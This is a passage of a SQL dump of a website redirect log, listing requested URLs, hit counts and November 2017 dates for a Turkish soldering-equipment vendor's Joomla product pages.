00:00:00',301),(12084,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/ã§ubuk-lehim',NULL,'','',330,0,'2017-11-17 01:22:55','0000-00-00 00:00:00',301),(12085,'http://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri',NULL,'','',34,0,'2017-11-17 01:28:43','0000-00-00 00:00:00',301),(12086,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,mf_name/dirdesc',NULL,'','',1,0,'2017-11-17 01:28:44','0000-00-00 00:00:00',301),(12087,'http://www.3s-technologies.com.tr/en/products/bã¶lgesel-lehimleme/by,product_sku',NULL,'','',2,0,'2017-11-17 01:29:25','0000-00-00 00:00:00',301),(12088,'http://www.3s-technologies.com.tr/tr/option=com_user&view=registration',NULL,'http://www.3s-technologies.com.tr/tr/option=com_user&view=registration','',1,0,'2017-11-17 01:29:28','0000-00-00 00:00:00',301),(12089,'http://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri',NULL,'','',29,0,'2017-11-17 01:33:30','0000-00-00 00:00:00',301),(12090,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,mf_name/results,1-5',NULL,'','',7,0,'2017-11-17 01:43:28','0000-00-00 00:00:00',301),(12091,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,mf_name',NULL,'','',211,0,'2017-11-17 01:48:40','0000-00-00 00:00:00',301),(12092,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/by,category_name/dirdesc',NULL,'','',2,0,'2017-11-17 01:53:47','0000-00-00 00:00:00',301),(12093,'http://www.3s-technologies.com.tr/tr/images/pdf/le40v_automated_pick_?_place.pdf',NULL,'','',26,0,'2017-11-17 01:56:16','0000-00-00 00:00:00',301),(12094,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/results,1-5',NULL,'','',9,0,'2017-11-17 01:58:55','0000-00-00 00:00:00',301),(12095,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,product_sku',NULL,'','',4,0,'2017-11-17 02:14:09','0000-00-00 00:00:00',301),(12096,'http://www.3s-technologies.com.tr/tr/urunler/konveyorler/results,1-5',NULL,'','',6,0,'2017-11-17 02:19:19','0000-00-00 00:00:00',301),(12097,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,mf_name/dirdesc',NULL,'','',10,0,'2017-11-17 02:34:28','0000-00-00 00:00:00',301),(12098,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',182,0,'2017-11-17 02:34:31','0000-00-00 00:00:00',301),(12099,'http://3s-technologies.com.tr/index.php/en/products/rh2-20-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-11-17 02:35:54','0000-00-00 00:00:00',301),(12100,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/by,mf_name/dirdesc?error=404&language=en-gb',NULL,'','',1,0,'2017-11-17 02:39:50','0000-00-00 00:00:00',301),(12101,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/by,ordering/results,1-5',NULL,'','',3,0,'2017-11-17 02:49:41','0000-00-00 00:00:00',301),(12102,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/by,category_name/dirdesc',NULL,'','',200,0,'2017-11-17 02:54:53','0000-00-00 00:00:00',301),(12103,'http://www.3s-technologies.com.tr/en/products/npm-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-17 02:55:18','0000-00-00 00:00:00',301),(12104,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_name/results,1-5',NULL,'','',4,0,'2017-11-17 03:00:53','0000-00-00 00:00:00',301),(12105,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,category_name?language=en-gb',NULL,'','',23,0,'2017-11-17 03:04:51','0000-00-00 00:00:00',301),(12106,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/results,1-5',NULL,'','',10,0,'2017-11-17 03:05:09','0000-00-00 00:00:00',301),(12107,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/by,pc.ordering,product_name/results,1-10',NULL,'','',3,0,'2017-11-17 03:10:08','0000-00-00 00:00:00',301),(12108,'http://www.3s-technologies.com.tr/tr/urunler/smd-fä±rä±n/ly-8c-detail',NULL,'','',8,0,'2017-11-17 03:15:32','0000-00-00 00:00:00',301),(12109,'http://3s-technologies.com.tr/en/products/trident-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-17 03:19:47','0000-00-00 00:00:00',301),(12110,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/by,mf_name',NULL,'','',44,0,'2017-11-17 03:20:18','0000-00-00 00:00:00',301),(12111,'http://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/ess-310-detail/askquestion?tmpl=component',NULL,'','',185,0,'2017-11-17 03:26:09','0000-00-00 00:00:00',301),(12112,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeldri/çubuk-lehim',NULL,'','',174,0,'2017-11-17 03:26:37','0000-00-00 00:00:00',301),(12113,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/e-bar-detail',NULL,'','',177,0,'2017-11-17 03:26:54','0000-00-00 00:00:00',301),(12114,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/e-bar-detail/askquestion?tmpl=component',NULL,'','',168,0,'2017-11-17 03:27:00','0000-00-00 00:00:00',301),(12115,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın',NULL,'','',333,0,'2017-11-17 03:27:17','0000-00-00 00:00:00',301),(12116,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku',NULL,'','',329,0,'2017-11-17 03:27:27','0000-00-00 00:00:00',301),(12117,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',337,0,'2017-11-17 03:27:44','0000-00-00 00:00:00',301),(12118,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,category_name',NULL,'','',340,0,'2017-11-17 03:28:25','0000-00-00 00:00:00',301),(12119,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,category_name/dirdesc',NULL,'','',336,0,'2017-11-17 03:28:35','0000-00-00 00:00:00',301),(12120,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,product_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-17 03:28:47','0000-00-00 00:00:00',301),(12121,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-17 03:29:00','0000-00-00 00:00:00',301),(12122,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/dirdesc',NULL,'','',389,0,'2017-11-17 03:29:07','0000-00-00 00:00:00',301),(12123,'http://www.3s-technologies.com.tr/tr/?option=com_user&view=registration',NULL,'http://www.3s-technologies.com.tr/tr/?option=com_user&view=registration','',1,0,'2017-11-17 03:43:12','0000-00-00 00:00:00',301),(12124,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/spartan-8s-8d-detail',NULL,'','',2,0,'2017-11-17 03:45:31','0000-00-00 00:00:00',301),(12125,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,`p`.product_sku/dirdesc',NULL,'','',2,0,'2017-11-17 03:46:53','0000-00-00 00:00:00',301),(12126,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by,product_sku?language=en-gb',NULL,'','',18,0,'2017-11-17 03:50:17','0000-00-00 00:00:00',301),(12127,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/by,pc.ordering,product_name',NULL,'','',547,0,'2017-11-17 03:54:19','0000-00-00 00:00:00',301),(12128,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/by,pc.ordering,product_name/dirdesc',NULL,'','',597,0,'2017-11-17 03:54:29','0000-00-00 00:00:00',301),(12129,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',556,0,'2017-11-17 03:54:59','0000-00-00 00:00:00',301),(12130,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler',NULL,'','',17,0,'2017-11-17 03:55:48','0000-00-00 00:00:00',301),(12131,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/paste_1_150x150.jpg',NULL,'','',2,0,'2017-11-17 03:56:22','0000-00-00 00:00:00',301),(12132,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,ordering/results,1-20',NULL,'','',7,0,'2017-11-17 04:16:09','0000-00-00 00:00:00',301),(12133,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/spartan-8s-8d-44-detail',NULL,'','',46,0,'2017-11-17 04:23:57','0000-00-00 00:00:00',301),(12134,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer',NULL,'','',44,0,'2017-11-17 04:24:00','0000-00-00 00:00:00',301),(12135,'http://www.3s-technologies.com.tr/en/products/screen-printer/spr-20-41-42-detail',NULL,'','',43,0,'2017-11-17 04:24:02','0000-00-00 00:00:00',301),(12136,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,mf_name',NULL,'','',5,0,'2017-11-17 04:26:17','0000-00-00 00:00:00',301),(12137,'http://www.3s-technologies.com.tr/en/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php','',5,0,'2017-11-17 04:34:27','0000-00-00 00:00:00',301),(12138,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/ã§ubuk-lehim/by,product_sku',NULL,'','',2,0,'2017-11-17 04:46:22','0000-00-00 00:00:00',301),(12139,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku',NULL,'','',3,0,'2017-11-17 04:47:35','0000-00-00 00:00:00',301),(12140,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,mf_name',NULL,'','',5,0,'2017-11-17 05:03:09','0000-00-00 00:00:00',301),(12141,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/by,ordering',NULL,'','',4,0,'2017-11-17 05:34:55','0000-00-00 00:00:00',301),(12142,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,ordering',NULL,'','',5,0,'2017-11-17 05:40:12','0000-00-00 00:00:00',301),(12143,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/am100-detail?tmpl=component&print=1',NULL,'','',2,0,'2017-11-17 05:50:47','0000-00-00 00:00:00',301),(12144,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/dalga-lehim/spartan-8s-8d-detail',NULL,'','',3,0,'2017-11-17 06:01:23','0000-00-00 00:00:00',301),(12145,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/245-sn63pb37-0.8mm-detail',NULL,'','',27,0,'2017-11-17 06:02:27','0000-00-00 00:00:00',301),(12146,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name',NULL,'','',6,0,'2017-11-17 06:06:42','0000-00-00 00:00:00',301),(12147,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturers/aqueous',NULL,'','',6,0,'2017-11-17 06:22:33','0000-00-00 00:00:00',301),(12148,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,product_sku',NULL,'','',230,0,'2017-11-17 06:23:17','0000-00-00 00:00:00',301),(12149,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name',NULL,'','',21,0,'2017-11-17 06:27:51','0000-00-00 00:00:00',301),(12150,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,product_name',NULL,'','',4,0,'2017-11-17 06:33:11','0000-00-00 00:00:00',301),(12151,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/index_01_250x250.jpg',NULL,'','',1,0,'2017-11-17 06:41:12','0000-00-00 00:00:00',301),(12152,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın',NULL,'','',5,0,'2017-11-17 06:43:43','0000-00-00 00:00:00',301),(12153,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim',NULL,'','',3,0,'2017-11-17 06:49:01','0000-00-00 00:00:00',301),(12154,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,product_sku',NULL,'','',7,0,'2017-11-17 06:54:19','0000-00-00 00:00:00',301),(12155,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız?language=tr-tr',NULL,'','',4,0,'2017-11-17 06:58:50','0000-00-00 00:00:00',301),(12156,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc',NULL,'','',1,0,'2017-11-17 07:04:54','0000-00-00 00:00:00',301),(12157,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,mf_name',NULL,'','',5,0,'2017-11-17 07:18:48','0000-00-00 00:00:00',301),(12158,'http://www.3s-technologies.com.tr/tr/urunler/stencil-washer-eco-detail?tmpl=component&print=1',NULL,'','',26,0,'2017-11-17 07:21:32','0000-00-00 00:00:00',301),(12159,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,mf_name',NULL,'','',4,0,'2017-11-17 07:26:04','0000-00-00 00:00:00',301),(12160,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,product_name',NULL,'','',2,0,'2017-11-17 07:36:40','0000-00-00 00:00:00',301),(12161,'http://www.3s-technologies.com.tr/tr/http:/',NULL,'','',1,0,'2017-11-17 07:54:08','0000-00-00 00:00:00',301),(12162,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,product_sku',NULL,'','',6,0,'2017-11-17 07:57:50','0000-00-00 00:00:00',301),(12163,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/dirdesc/results,1-100',NULL,'','',4,0,'2017-11-17 08:08:27','0000-00-00 00:00:00',301),(12164,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,product_sku',NULL,'','',4,0,'2017-11-17 08:34:54','0000-00-00 00:00:00',301),(12165,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/results,1-20',NULL,'','',1,0,'2017-11-17 08:45:29','0000-00-00 00:00:00',301),(12166,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/by,product_sku/results,1-10',NULL,'','',5,0,'2017-11-17 09:01:22','0000-00-00 00:00:00',301),(12167,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,mf_name',NULL,'','',6,0,'2017-11-17 09:06:40','0000-00-00 00:00:00',301),(12168,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,product_name',NULL,'','',7,0,'2017-11-17 09:17:15','0000-00-00 00:00:00',301),(12169,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/gf-12-hc-ht-detail',NULL,'','',10,0,'2017-11-17 09:38:25','0000-00-00 00:00:00',301),(12170,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,product_name',NULL,'','',2,0,'2017-11-17 09:43:43','0000-00-00 00:00:00',301),(12171,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/rh6-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-17 09:45:33','0000-00-00 00:00:00',301),(12172,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,product_name',NULL,'','',9,0,'2017-11-17 09:59:37','0000-00-00 00:00:00',301),(12173,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name/results,1-10',NULL,'','',3,0,'2017-11-17 10:04:54','0000-00-00 00:00:00',301),(12174,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,ordering',NULL,'','',1,0,'2017-11-17 10:10:11','0000-00-00 00:00:00',301),(12175,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,category_name',NULL,'','',3,0,'2017-11-17 10:15:29','0000-00-00 00:00:00',301),(12176,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,category_name?language=en-gb',NULL,'','',2,0,'2017-11-17 10:44:01','0000-00-00 00:00:00',301),(12177,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name/results,1-100',NULL,'','',1,0,'2017-11-17 11:03:07','0000-00-00 00:00:00',301),(12178,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_sku',NULL,'','',3,0,'2017-11-17 11:08:25','0000-00-00 00:00:00',301),(12179,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,product_name',NULL,'','',5,0,'2017-11-17 11:13:43','0000-00-00 00:00:00',301),(12180,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/dirdesc/results,1-10',NULL,'','',5,0,'2017-11-17 11:26:18','0000-00-00 00:00:00',301),(12181,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,`p`.product_sku',NULL,'','',4,0,'2017-11-17 11:38:51','0000-00-00 00:00:00',301),(12182,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_sku/results,1-10',NULL,'','',1,0,'2017-11-17 11:38:57','0000-00-00 00:00:00',301),(12183,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_sku/results,1-5',NULL,'','',1,0,'2017-11-17 11:39:10','0000-00-00 00:00:00',301),(12184,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,product_name/dirdesc/results,1-5',NULL,'','',1,0,'2017-11-17 11:39:32','0000-00-00 00:00:00',301),(12185,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim',NULL,'','',32,0,'2017-11-17 11:49:45','0000-00-00 00:00:00',301),(12186,'http://3s-technologies.com.tr/index.php/en/products/screen-printer/by,product_sku?language=en-gb',NULL,'','',19,0,'2017-11-17 11:50:34','0000-00-00 00:00:00',301),(12187,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_sku',NULL,'','',7,0,'2017-11-17 11:57:01','0000-00-00 00:00:00',301),(12188,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,category_name',NULL,'','',5,0,'2017-11-17 12:00:40','0000-00-00 00:00:00',301),(12189,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,`p`.product_sku/results,1-50',NULL,'','',1,0,'2017-11-17 12:04:18','0000-00-00 00:00:00',301),(12190,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,pc.ordering,product_name',NULL,'','',7,0,'2017-11-17 12:22:29','0000-00-00 00:00:00',301),(12191,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-17 12:31:14','0000-00-00 00:00:00',301),(12192,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/275-k100-1mm-28-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-17 12:33:08','0000-00-00 00:00:00',301),(12193,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_name',NULL,'','',5,0,'2017-11-17 12:40:39','0000-00-00 00:00:00',301),(12194,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/spr-20-detail',NULL,'','',58,0,'2017-11-17 12:50:07','0000-00-00 00:00:00',301),(12195,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,ordering?language=en-gb',NULL,'','',1,0,'2017-11-17 12:51:34','0000-00-00 00:00:00',301),(12196,'http://3s-technologies.com.tr/en/products/manufacturers/tolo',NULL,'','',43,0,'2017-11-17 12:58:51','0000-00-00 00:00:00',301),(12197,'https://www.3s-technologies.com.tr/tr/?option=com_user&view=register',NULL,'','',13,0,'2017-11-17 12:59:13','0000-00-00 00:00:00',301),(12198,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name',NULL,'','',4,0,'2017-11-17 13:02:29','0000-00-00 00:00:00',301),(12199,'http://www.3s-technologies.com.tr/index.php/en/products/245-sn63pb37-0.6mm-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-17 13:11:17','0000-00-00 00:00:00',301),(12200,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/spartan-8s-8d-detail?tmpl=component&print=1',NULL,'','',2,0,'2017-11-17 13:13:23','0000-00-00 00:00:00',301),(12201,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı',NULL,'','',86,0,'2017-11-17 13:24:18','0000-00-00 00:00:00',301),(12202,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,mf_name/dirdesc',NULL,'','',4,0,'2017-11-17 13:31:35','0000-00-00 00:00:00',301),(12203,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_name',NULL,'','',2,0,'2017-11-17 13:35:12','0000-00-00 00:00:00',301),(12204,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/dirdesc/results,1-50',NULL,'','',4,0,'2017-11-17 13:38:51','0000-00-00 00:00:00',301),(12205,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,mf_name',NULL,'','',221,0,'2017-11-17 13:42:28','0000-00-00 00:00:00',301),(12206,'http://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/ls60v-detail/askquestion?tmpl=component',NULL,'','',150,0,'2017-11-17 13:45:14','0000-00-00 00:00:00',301),(12207,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-orta-hızlı',NULL,'','',15,0,'2017-11-17 13:49:08','0000-00-00 00:00:00',301),(12208,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&itemid=131&lang=tr',NULL,'','',55,0,'2017-11-17 13:53:23','0000-00-00 00:00:00',301),(12209,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/dirdesc/results,1-5',NULL,'','',6,0,'2017-11-17 14:29:46','0000-00-00 00:00:00',301),(12210,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,category_name',NULL,'','',2,0,'2017-11-17 14:33:23','0000-00-00 00:00:00',301),(12211,'http://www.3s-technologies.com.tr/en/products/smd-orta-hä±zlä±/by,mf_name',NULL,'','',1,0,'2017-11-17 14:58:04','0000-00-00 00:00:00',301),(12212,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name',NULL,'','',7,0,'2017-11-17 14:58:50','0000-00-00 00:00:00',301),(12213,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&itemid=28&lang=tr',NULL,'','',3,0,'2017-11-17 15:06:06','0000-00-00 00:00:00',301),(12214,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/results,1-40',NULL,'','',5,0,'2017-11-17 15:38:50','0000-00-00 00:00:00',301),(12215,'http://www.3s-technologies.com.tr/en/products/smd-fırın/by,mf_name/results,1-50',NULL,'','',6,0,'2017-11-17 15:42:28','0000-00-00 00:00:00',301),(12216,'http://3s-technologies.com.tr/index.php/en/products/ls60v-detail?tmpl=component&print=1',NULL,'','',12,0,'2017-11-17 15:42:51','0000-00-00 00:00:00',301),(12217,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,`p`.product_sku',NULL,'','',3,0,'2017-11-17 15:57:01','0000-00-00 00:00:00',301),(12218,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,pc.ordering,product_name',NULL,'','',4,0,'2017-11-17 15:59:47','0000-00-00 00:00:00',301),(12219,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/dirdesc/results,1-5',NULL,'','',6,0,'2017-11-17 16:15:13','0000-00-00 00:00:00',301),(12220,'http://www.3s-technologies.com.tr/tr/joomla/images/pdf/rl131_1sf_09.pdf',NULL,'','',16,0,'2017-11-17 16:26:07','0000-00-00 00:00:00',301),(12221,'http://www.3s-technologies.com.tr/en/products/smd-fırın/by,mf_name/results,1-10',NULL,'','',4,0,'2017-11-17 16:33:22','0000-00-00 00:00:00',301),(12222,'http://www.3s-technologies.com.tr/index.php/tr/anasayfa2/80-turkish-tr/turkish-content/84-kester-lehimleme-malzemeleri',NULL,'','',46,0,'2017-11-17 16:37:02','0000-00-00 00:00:00',301),(12223,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız',NULL,'','',205,0,'2017-11-17 16:40:25','0000-00-00 00:00:00',301),(12224,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın',NULL,'','',105,0,'2017-11-17 16:44:17','0000-00-00 00:00:00',301),(12225,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/ls60v-detail/askquestion?tmpl=component',NULL,'','',227,0,'2017-11-17 17:12:28','0000-00-00 00:00:00',301),(12226,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/dirdesc/results,1-20',NULL,'','',4,0,'2017-11-17 17:17:00','0000-00-00 00:00:00',301),(12227,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/dirdesc?language=en-gb',NULL,'','',26,0,'2017-11-17 17:17:59','0000-00-00 00:00:00',301),(12228,'http://www.3s-technologies.com.tr/en/products/smd-fırın/by,ordering/results,1-10',NULL,'','',8,0,'2017-11-17 17:27:56','0000-00-00 00:00:00',301),(12229,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&itemid=60&lang=tr',NULL,'','',5,0,'2017-11-17 17:31:33','0000-00-00 00:00:00',301),(12230,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,`p`.product_sku',NULL,'','',2,0,'2017-11-17 17:32:53','0000-00-00 00:00:00',301),(12231,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae',NULL,'','',29,0,'2017-11-17 17:37:11','0000-00-00 00:00:00',301),(12232,'http://3s-technologies.com.tr/index.php/en/products/245-k100-28-detail?tmpl=component&print=1',NULL,'','',2,0,'2017-11-17 17:44:02','0000-00-00 00:00:00',301),(12233,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name',NULL,'','',6,0,'2017-11-17 18:00:39','0000-00-00 00:00:00',301),(12234,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/dirdesc/results,1-20',NULL,'','',6,0,'2017-11-17 18:11:33','0000-00-00 00:00:00',301),(12235,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,mf_name/dirdesc',NULL,'','',5,0,'2017-11-17 18:15:11','0000-00-00 00:00:00',301),(12236,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/dirdesc',NULL,'','',392,0,'2017-11-17 18:18:10','0000-00-00 00:00:00',301),(12237,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/dirdesc',NULL,'','',8,0,'2017-11-17 18:19:19','0000-00-00 00:00:00',301),(12238,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&itemid=120&lang=tr',NULL,'','',2,0,'2017-11-17 18:22:28','0000-00-00 00:00:00',301),(12239,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2-el-makineler/avb-detail',NULL,'','',7,0,'2017-11-17 18:42:27','0000-00-00 00:00:00',301),(12240,'http://3s-technologies.com.tr/tr/urunler/screen-printer/dirdesc',NULL,'','',18,0,'2017-11-17 19:01:06','0000-00-00 